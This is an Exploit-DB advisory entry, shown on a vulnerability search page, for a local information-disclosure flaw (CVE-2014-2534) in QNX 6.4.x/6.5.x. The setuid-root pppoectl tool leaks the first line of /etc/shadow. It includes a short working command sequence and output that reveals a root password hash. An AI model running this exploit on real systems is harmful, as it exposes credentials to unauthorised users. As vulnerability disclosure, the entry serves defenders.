Lucene search
CenobyteEDB-ID:32156HistoryMar 10, 2014 - 12:00 a.m.
QNX 6.4.x/6.5.x pppoectl - Information Disclosure
2014-03-1000:00:00
cenobyte
www.exploit-db.com
18
AI Score
7.4
Confidence
Low
#
# QNX 6.4.x/6.5.x pppoectl disclose /etc/shadow by cenobyte 2013
# <[email protected]>
#
# - vulnerability description:
# QNX setuid root /sbin/pppoectl allows any user to gain access to privileged
# information such as the root password hash.
#
# The vulnerability exists because of a failure to drop privileges or check the
# permissions and ownership on the file specified as the configuration file.
#
# If a user specifies a file such as /etc/shadow, pppoectl will display the
# first line of the shadow file in the error output.
#
# - vulnerable platforms:
# QNX 6.5.0SP1
# QNX 6.5.0
# QNX 6.4.1
$ id
uid=100(user) gid=100
$ ls -la /etc/shadow
-rw------- 1 root root 69 Oct 10 16:55 /etc/shadow
$ pppoectl -f /etc/shadow lo0
pppoectl: bad parameter: "root:QSkSGrRQOSLoO:1380296317:0:0"Related
prion
prion
Design/Logic Flaw
2014-03-18 05:18:00
nvd
nvd
CVE-2014-2534
2014-03-18 05:18:19
cve
cve
CVE-2014-2534
2014-03-18 05:18:19
cvelist
cvelist
CVE-2014-2534
2014-03-18 01:00:00